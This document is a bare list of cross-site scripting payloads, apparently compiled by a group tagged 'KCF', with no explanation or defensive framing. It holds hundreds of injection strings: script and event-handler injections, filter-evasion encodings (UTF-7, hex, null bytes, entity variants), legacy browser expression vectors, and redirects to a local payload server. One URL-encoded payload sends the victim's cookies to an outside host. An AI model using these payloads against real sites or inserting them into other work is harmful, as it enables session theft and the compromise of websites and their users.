<img src=‘vbscript:do%63ument.lo%63ation="http://127.0.0.1:3555/xss_serve_payloads/kcf.html"‘>

&lt;META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="&gt;

&lt;META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1);"&gt;

&lt;DIV STYLE="background-image:07507206C028‘06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029‘029"&gt;

&lt;STYLE&gt;@import‘javasc
ipt:alert(1)‘;&lt;/STYLE&gt;

exp/*<A STYLE=‘noKCF:noKCF("*//*");

<STYLE TYPE="text/javascript">alert(1);</STYLE>

&lt;STYLE&gt;.KCF{background-image:url("javascript:alert(1)");}&lt;/STYLE&gt;&lt;A class="KCF"&gt;&lt;/A&gt;

&lt;STYLE type="text/css"&gt;BODY{background:url("javascript:alert(1)")}&lt;/STYLE&gt;

<SCRIPT>alert(1);</SCRIPT>

&lt;OBJECT TYPE="text/x-scriptlet" DATA="http://127.0.0.1:3555/xss_serve_payloads/kcf.html"&gt;&lt;/OBJECT&gt;

&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(1)&gt;&lt;/OBJECT&gt;

&lt;EMBED SRC="data:image/svg+xml;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=" type="image/svg+xml" AllowScriptAccess="always"&gt;&lt;/EMBED&gt;

a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert(1);")";&#10;eval(a+b+c+d);

&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC="javas]]&gt;&lt;![CDATA[cript:alert(1);"&gt;]]&gt;

&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;

&lt;XML ID=0&gt;&lt;I&gt;&lt;B&gt;&amp;lt;IMG SRC="javas&lt;!-- --&gt;cript:alert(1)"&amp;gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;

<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

<?import namespace="t" implementation="#default#time2">

&lt;t:set attributeName="innerHTML" to="KCF&amp;lt;SCRIPT DEFER&amp;gt;alert(&amp;quot;KCF&amp;quot;)&amp;lt;/SCRIPT&amp;gt;"&gt;

</BODY></HTML>

<? echo(‘<SCR)‘;

echo(‘IPT>alert(1)</SCRIPT>‘); ?>

&lt;META HTTP-EQUIV="Set-Cookie" Content="USERID=&amp;lt;SCRIPT&amp;gt;alert(1)&amp;lt;/SCRIPT&amp;gt;"&gt;

&lt;HEAD&gt;&lt;META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-

&lt;A HREF="http://127.0.0.1:3555/xss_serve_payloads/kcf.html./"&gt;KCF&lt;/A&gt;

&lt;A HREF="javascript:document.location=‘http://127.0.0.1:3555/xss_serve_payloads/kcf.html‘"&gt;KCF&lt;/A&gt;

&lt;A HREF="http://www.keralacyberhttp://www.keralacyberforce.in/force.in/"&gt;KCF&lt;/A&gt;

<form id="test" /><button form="test" formaction="javascript:alert(1)">X

<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>

<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>

<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>

<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="></embed>

<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>

<b <script>alert(1)//</script>0</script></b>

<? foo="><script>alert(1)</script>">

<! foo="><script>alert(1)</script>">

</ foo="><script>alert(1)</script>">

<? foo="><x foo=‘?><script>alert(1)</script>‘>">

<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">

<% foo><x foo="%><script>alert(1)</script>">

<iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/kcf.html!kcf.html></iframe>

<iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/kcf.gif!kcf.html></iframe>

<div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>

<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">

<img src="x` `<script>alert(1)</script>"` `>

<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=alert(1)></a>">

<!a foo=x=`y><img alt="`><img src=x:x onerror=alert(2)//">

<?a foo=x=`y><img alt="`><img src=x:x onerror=alert(3)//">

<!-- `<img/src=xx:xx onerror=alert(1)//--!>

<xmp> <% </xmp> <img alt=‘%></xmp><img src=xx:x onerror=alert(1)//‘> <script> x=‘<%‘ </script> %>/ alert(2) </script> XXX <style> *[‘<!--‘]{} </style> -->{} *{color:red}</style>

<img src=x onerror=alert(1)//">

<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>

<style>p[foo=bar{}*{-o-link:‘javascript:alert(1)‘}{}*{-o-link-source:current}*{background:red}]{background:green};</style>

<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>

* {-o-link:‘javascript:alert(1)‘;-o-link-source: current;}

<div style="63&#96f&#10006c&#120006F&#13R:00072 Ed;colorla:yellowla;col0 &#xA0or:blue;">XXX</div>

<// style=x:expression28write(1)29>

<div id=d><div style="font-family:‘sans272F2A222A2F3B color3Ared3B‘">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>

<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>

<script>ReferenceError.prototype.__defineGetter__(‘name‘, function(){alert(1)}),x</script>

<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)‘)()</script>

+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);

0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts(‘data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk‘))

<script>crypto.generateCRMFRequest(‘CN=0‘,0,0,null,‘alert(1)‘,384,null,‘rsa-dual-use‘)</script>

<script>[{‘a‘:Object.prototype.__defineSetter__(‘b‘,function(){alert(arguments[0])}),‘b‘:[‘secret‘]}]</script>

<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg

<iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>

<?xml-stylesheet href="javascript:alert(1)"?><root/>

<!DOCTYPE x[<!ENTITY x SYSTEM "http://127.0.0.1:3555/xss_serve_payloads/kcf.html">]><y>&x;</y>

<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>

<?xml-stylesheet type="text/xsl" href="#" ?> <stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> <template match="/"> <eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(1)</eval> <if expr="new ActiveXObject(‘htmlfile‘).parentWindow.alert(2)"></if> </template> </stylesheet>

<!ENTITY x "&#x3C;html:img&#x20;src=‘x‘&#x20;xmlns:html=‘http://www.w3.org/1999/xhtml‘&#x20;onerror=‘alert(1)‘/&#x3E;">

X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >

1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(1)&gt;`>

1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(1)&gt;>

1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#kcf></vmlframe>

<xml> <rect style="height:100%;width:100%" id="kcf" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>

1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>

<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>

<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS><SCRIPT Language="javascript">alert(1)</SCRIPT></SCRIPTLET>

<xml id="kcf" src="test.htc"></xml><label dataformatas="html" datasrc="#kcf" datafld="payload"></label>

<?xml version="1.0"?> x><payload><![CDATA[<img src=x onerror=alert(1)>]]></payload></x>

<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>

object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>

class kcf {public static function main() { flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||"javascript:alert(1)"),flash.Lib._root.name||"_top"); }}

<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>

<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

X<form id=test onforminput=javascript:alert(1)><input></form>

X<form id=test><input></form><button form=test onformchange==javascript:alert(1)>X

<marquee<marquee/onstart=confirm(1)>/onstart=confirm(1)>

<body language=vbsonload=alert-1

<command onmouseover="x6Ax61x76x61x53x43x52x49x50x54x26x63x6Fx6Cx6Fx6Ex3Bx63x6Fx6Ex66x69x72x6Dx26x6Cx70x61x72x3Bx31x26x72x70x61x72x3B">Save</command>

eval("aler"+(!![]+[])[+[]])("KCF")

this["alert"]("KCF")

window["alert"]("KCF")

this[‘ale‘+(!![]+[])[-~[]]+(!![]+[])[+[]]]()

< %3C &lt &lt; &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 &#60; &#060; &#0060; &#00060; &#000060; &#0000060; &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c &#x3c; &#x03c; &#x003c; &#x0003c; &#x00003c; &#x000003c; &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c &#X3c; &#X03c; &#X003c; &#X0003c; &#X00003c; &#X000003c; &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C &#x3C; &#x03C; &#x003C; &#x0003C; &#x00003C; &#x000003C; &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C &#X3C; &#X03C; &#X003C; &#X0003C; &#X00003C; &#X000003C; x3c x3C u003c u003C

<A HREF="http://127.0.0.1:3555/xss_serve_payloads/[email protected]">KCF</A

document.write(‘<iframe src="http://127.0.0.1:3555/xss_serve_payloads/kcf.html" style="border: 0; width: 100%; height: 100%"></iframe>‘)

http://%22%20onerror=%22alert%281%29;//

document.location=‘http://127.0.0.1:3555/xss_serve_payloads/kcf.html‘

document.location="http://127.0.0.1:3555/xss_serve_payloads/kcf.html"

"><script>alert(/KCF/)<script>

;alert%28String.fromCharCode%2875,67,70%29%29//\%27;alert%28String.fromCharCode%2875,67,70%29%29//%22;alert%28String.fromCharCode%2875,67,70%29%29//\%22;alert%28String.fromCharCode%2875,67,70%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2875,67,70%29%29%3C/SCRIPT%3E

<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>

<body onscroll=prompt(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>

<form id=test onforminput=prompt(1)><input></form><button form=test onformchange=prompt(2)>X</button>

<SCRIPT FOR=document EVENT=onreadystatechange>prompt(1)</SCRIPT>

<img[a][b]src=x[d]onerror[c]=[e]"prompt(1)">

‘-prompt("KCF")-‘

‘-prompt(kcf)‘

‘-prompt(KCF)-‘

‘-alert("KCF")-‘

‘;alert(String.fromCharCode(75,67,70))//‘;alert(String.fromCharCode(75,67,70))//";

alert(String.fromCharCode(75,67,70))//";alert(String.fromCharCode(75,67,70))//--></SCRIPT>">‘><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

";alert(‘KCF‘);//

exp/*<A STYLE=‘nokcf:nokcf("*//*");kcf:ex/*KCF*//*/*/pression(alert("KCF"))‘>

‘"--></style></script><script>alert("KCF")</script>

‘"--></style></script><script>prompt(1)</script>

&‘"><script>alert(/kcf/)</script>

%26‘%22%3E%3Cscript%3Ealert(%2Fkcf%2F)%3C%2Fscript%3E%3D

&‘">PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4

&‘">/‘-C<FEP=#YA;&5R="@O>‘-S+RD+W-C<FEP=#.

&‘">u{3c}u{73}u{63}u{72}u{69}u{70}u{74}u{3e}u{61}u{6c}u{65}u{72}u{74}u{28}u{2f}u{78}u{73}u{73}u{2f}u{29}u{3c}u{2f}u{73}u{63}u{72}u{69}u{70}u{74}u{3e}

&‘">u003cu0073u0063u0072u0069u0070u0074u003eu0061u006cu0065u0072u0074u0028u002fu0078u0073u0073u002fu0029u003cu002fu0073u0063u0072u0069u0070u0074u003e

&‘">0x3c7363726970743e616c657274282f7873732f293c2f7363726970743e

&‘">-1,54,38,53,44,51,55,-1,36,47,40,53,55,-1,-1,59,54,54,-1,-1,-1,-1,54,38,53,44,51,55,-1

&‘">PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=

&‘">3e7470697263732f3c292f7373782f287472656c613e7470697263733c

&‘">chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62).chr(97).chr(108).chr(101).chr(114).chr(116).chr(40).chr(47).chr(120).chr(115).chr(115).chr(47).chr(41).chr(60).chr(47).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62)

&‘">TypeError: Cannot read property ‘$content$‘ of undefined

&‘">741631431621511601647614115414516216450571701631635751745716314316215116016476

&‘"><script>alert(/kcf/)</ā??>

&‘">%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u003e%u0061%u006c%u0065%u0072%u0074%u0028%u002f%u0078%u0073%u0073%u002f%u0029%u003c%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003e

&‘">uff1cuff53uff43uff52uff49uff50uff54uff1euff41uff4cuff45uff52uff54uff08uff0fuff58uff53uff53uff0fuff09uff1cuff0fuff53uff43uff52uff49uff50uff54uff1e

&‘"><script>alert(/kcf/)</script>

&‘">Description:Syntax error Msg:Unexpected token < )

</script><svg onload=‘-/"/-alert(1)//‘>

<![CDATA[<script>alert(kcf)</script>]]>

[data "1<div style=width:expression(prompt(1))>"]

+onerror=alert(1)%3E/

+onerror=prompt(1)%3E/

?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

?#?gad=xxxx"onload="alert(1)"

#?gad=xxxx"onload="alert(1)"

/#?gad=xxxx"onload="alert(1)"

“><script >alert(1)</script >

“><ScRiPt>alert(1)</ScRiPt>

“%3e%3cscript%3ealert(1)%3c/script%3e

“><scr<script>ipt>alert(1)</scr</script>ipt>

%00“><script>alert(1)</script>

</a onmousemove=alert(1)>

<event-source src=javascript:alert(1)>

<[%00]img onerror=alert(1) src=a>

<i[%00]mg onerror=alert(1) src=a>

<img[%09]onerror=alert(1) src=a>

<img[%0d]onerror=alert(1) src=a>

<img[%0a]onerror=alert(1) src=a>

<i[%00]m[%00]g o[%00]ner[%00]r[%00]or[%00]=a[%00]ler[%00]t(1) sr[%00]c=[%00]a>

%253cimg%20onerror=alert(1)%20src=a%253e

%3cimg onerror=alert(1) src=a%3e

?img onerror=alert(1) src=a?

<img onerror=&#x65;&#x76;&#x61;&#x6c;&#x28;&#x27;al&#x5c;u0065rt&#x28;1&#x29;&#x27;&#x29; src=a>

<SCRIPT LANGUAGE=VBS>MSGBOX 1</SCRIPT>

<SCRIPT LANGUAGE=VBS>EXECSCRIPT(LCASE(“ALERT(1)”)) </SCRIPT>

<scr%00ipt%20&message=> alert(‘kcf’)</script>

“<script>prompt(1)</script>

“;alert(1)//

‘-alert(1)-’

“<script>alert(1)</script>

“;prompt(1)//

‘-prompt(1)-’

<scriptx20type="text/javascript">javascript:alert(1);</script>

<scriptx3Etype="text/javascript">javascript:alert(1);</script>

<scriptx0Dtype="text/javascript">javascript:alert(1);</script>

<scriptx09type="text/javascript">javascript:alert(1);</script>

<scriptx0Ctype="text/javascript">javascript:alert(1);</script>

<scriptx2Ftype="text/javascript">javascript:alert(1);</script>

<scriptx0Atype="text/javascript">javascript:alert(1);</script>

‘`"><x3Cscript>javascript:alert(1)</script>

‘`"><x00script>javascript:alert(1)</script>

<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>

<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>

<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>

<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>

<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>

<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>

<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>

<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>

<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>

<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>

<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>

<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>

<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>

<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>

<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>

<applet onError applet onError="javascript:javascript:alert(1)"></applet onError>

<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>

<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>

<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>

<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>

<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>

<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>

<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>

<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>

<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>

<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>

<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>

<object onError object onError="javascript:javascript:alert(1)"></object onError>

<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>

<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>

<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>

<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>

<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>

<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>

<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>

<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>

<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>

<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>

<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>

x3Cscript>javascript:alert(1)</script>

‘"`><script>/* *x2Fjavascript:alert(1)// */</script>

--> <img src=xxx:x onerror=javascript:alert(1)> -->

-->

-->

-->

`"‘><img src=‘#x27 onerror=javascript:alert(1)>

"‘`><p><svg><script>a=‘hellox27;javascript:alert(1)//‘;</script></p>

"‘`>ABC<div style="font-family:‘foo‘x7Dx:expression(javascript:alert(1);/*‘;">DEF

"‘`>ABC<div style="font-family:‘foo‘x3Bx:expression(javascript:alert(1);/*‘;">DEF

‘`"><x3Cscript>javascript:alert(1)</script>

"‘`><x3Cimg src=xxx:x onerror=javascript:alert(1)>

"‘`><x00img src=xxx:x onerror=javascript:alert(1)>

ABC<div style="xx3Aexpression(javascript:alert(1)">DEF

ABC<div style="x:expressionx5C(javascript:alert(1)">DEF

ABC<div style="x:expressionx00(javascript:alert(1)">DEF

ABC<div style="x:expx00ression(javascript:alert(1)">DEF

ABC<div style="x:expx5Cression(javascript:alert(1)">DEF

ABC<div style="x:x0Aexpression(javascript:alert(1)">DEF

ABC<div style="x:x09expression(javascript:alert(1)">DEF

ABC<div style="x:xE3x80x80expression(javascript:alert(1)">DEF

ABC<div style="x:xE2x80x84expression(javascript:alert(1)">DEF

ABC<div style="x:xC2xA0expression(javascript:alert(1)">DEF

ABC<div style="x:xE2x80x80expression(javascript:alert(1)">DEF

ABC<div style="x:xE2x80x8Aexpression(javascript:alert(1)">DEF

ABC<div style="x:x0Dexpression(javascript:alert(1)">DEF

ABC<div style="x:x0Cexpression(javascript:alert(1)">DEF

ABC<div style="x:xE2x80x87expression(javascript:alert(1)">DEF

ABC<div style="x:xEFxBBxBFexpression(javascript:alert(1)">DEF

ABC<div style="x:x20expression(javascript:alert(1)">DEF

ABC<div style="x:xE2x80x88expression(javascript:alert(1)">DEF

ABC<div style="x:x00expression(javascript:alert(1)">DEF

ABC<div style="x:xE2x80x8Bexpression(javascript:alert(1)">DEF

ABC<div style="x:xE2x80x86expression(javascript:alert(1)">DEF

ABC<div style="x:xE2x80x85expression(javascript:alert(1)">DEF

ABC<div style="x:xE2x80x82expression(javascript:alert(1)">DEF

ABC<div style="x:x0Bexpression(javascript:alert(1)">DEF

ABC<div style="x:xE2x80x81expression(javascript:alert(1)">DEF

ABC<div style="x:xE2x80x83expression(javascript:alert(1)">DEF

ABC<div style="x:xE2x80x89expression(javascript:alert(1)">DEF

`"‘><img src=xxx:x x0Aonerror=javascript:alert(1)>

`"‘><img src=xxx:x x22onerror=javascript:alert(1)>

`"‘><img src=xxx:x x0Bonerror=javascript:alert(1)>

`"‘><img src=xxx:x x0Donerror=javascript:alert(1)>

`"‘><img src=xxx:x x2Fonerror=javascript:alert(1)>

`"‘><img src=xxx:x x09onerror=javascript:alert(1)>

`"‘><img src=xxx:x x0Conerror=javascript:alert(1)>

`"‘><img src=xxx:x x00onerror=javascript:alert(1)>

`"‘><img src=xxx:x x27onerror=javascript:alert(1)>

`"‘><img src=xxx:x x20onerror=javascript:alert(1)>

"`‘><script>x3Bjavascript:alert(1)</script>

"`‘><script>x0Djavascript:alert(1)</script>

"`‘><script>xEFxBBxBFjavascript:alert(1)</script>

"`‘><script>xE2x80x81javascript:alert(1)</script>

"`‘><script>xE2x80x84javascript:alert(1)</script>

"`‘><script>xE3x80x80javascript:alert(1)</script>

"`‘><script>x09javascript:alert(1)</script>

"`‘><script>xE2x80x89javascript:alert(1)</script>

"`‘><script>xE2x80x85javascript:alert(1)</script>

"`‘><script>xE2x80x88javascript:alert(1)</script>

"`‘><script>x00javascript:alert(1)</script>

"`‘><script>xE2x80xA8javascript:alert(1)</script>

"`‘><script>xE2x80x8Ajavascript:alert(1)</script>

"`‘><script>xE1x9Ax80javascript:alert(1)</script>

"`‘><script>x0Cjavascript:alert(1)</script>

"`‘><script>x2Bjavascript:alert(1)</script>

"`‘><script>xF0x90x96x9Ajavascript:alert(1)</script>

"`‘><script>-javascript:alert(1)</script>

"`‘><script>x0Ajavascript:alert(1)</script>

"`‘><script>xE2x80xAFjavascript:alert(1)</script>

"`‘><script>x7Ejavascript:alert(1)</script>

"`‘><script>xE2x80x87javascript:alert(1)</script>

"`‘><script>xE2x81x9Fjavascript:alert(1)</script>

"`‘><script>xE2x80xA9javascript:alert(1)</script>

"`‘><script>xC2x85javascript:alert(1)</script>

"`‘><script>xEFxBFxAEjavascript:alert(1)</script>

"`‘><script>xE2x80x83javascript:alert(1)</script>

"`‘><script>xE2x80x8Bjavascript:alert(1)</script>

"`‘><script>xEFxBFxBEjavascript:alert(1)</script>

"`‘><script>xE2x80x80javascript:alert(1)</script>

"`‘><script>x21javascript:alert(1)</script>

"`‘><script>xE2x80x82javascript:alert(1)</script>

"`‘><script>xE2x80x86javascript:alert(1)</script>

"`‘><script>xE1xA0x8Ejavascript:alert(1)</script>

"`‘><script>x0Bjavascript:alert(1)</script>

"`‘><script>x20javascript:alert(1)</script>

"`‘><script>xC2xA0javascript:alert(1)</script>

"/><img/onerror=x0Bjavascript:alert(1)x0Bsrc=xxx:x />

"/><img/onerror=x22javascript:alert(1)x22src=xxx:x />

"/><img/onerror=x09javascript:alert(1)x09src=xxx:x />

"/><img/onerror=x27javascript:alert(1)x27src=xxx:x />

"/><img/onerror=x0Ajavascript:alert(1)x0Asrc=xxx:x />

"/><img/onerror=x0Cjavascript:alert(1)x0Csrc=xxx:x />

"/><img/onerror=x0Djavascript:alert(1)x0Dsrc=xxx:x />

"/><img/onerror=x60javascript:alert(1)x60src=xxx:x />

"/><img/onerror=x20javascript:alert(1)x20src=xxx:x />

<scriptx2F>javascript:alert(1)</script>

<scriptx20>javascript:alert(1)</script>

<scriptx0D>javascript:alert(1)</script>

<scriptx0A>javascript:alert(1)</script>

<scriptx0C>javascript:alert(1)</script>

<scriptx00>javascript:alert(1)</script>

<scriptx09>javascript:alert(1)</script>

`"‘><img src=xxx:x onerrorx0B=javascript:alert(1)>

`"‘><img src=xxx:x onerrorx00=javascript:alert(1)>

`"‘><img src=xxx:x onerrorx0C=javascript:alert(1)>

`"‘><img src=xxx:x onerrorx0D=javascript:alert(1)>

`"‘><img src=xxx:x onerrorx20=javascript:alert(1)>

`"‘><img src=xxx:x onerrorx0A=javascript:alert(1)>

`"‘><img src=xxx:x onerrorx09=javascript:alert(1)>

<video poster=javascript:javascript:alert(1)//

<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>

<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X

<form><button formaction="javascript:javascript:alert(1)">X

<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://127.0.0.1:3555/xss_serve_payloads/kcf.html" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>

<img src=x onerror=javascript:alert(1)//">

<![><img src="]><img src=x onerror=javascript:alert(1)//">

<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>

<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">KCF</a></body>

<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>

<b <script>alert(1)</script>0

<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>

<? foo="><script>javascript:alert(1)</script>">

<! foo="><script>javascript:alert(1)</script>">

</ foo="><script>javascript:alert(1)</script>">

<? foo="><x foo=‘?><script>javascript:alert(1)</script>‘>">

<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">

<% foo><x foo="%><script>javascript:alert(1)</script>">

<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>

<imgx47src=x onerror="javascript:alert(1)">

<imgx10src=x onerror="javascript:alert(1)">

<imgx13src=x onerror="javascript:alert(1)">

<imgx32src=x onerror="javascript:alert(1)">

<imgx11src=x onerror="javascript:alert(1)">

<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">

<img src="x` `<script>javascript:alert(1)</script>"` `>

<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">

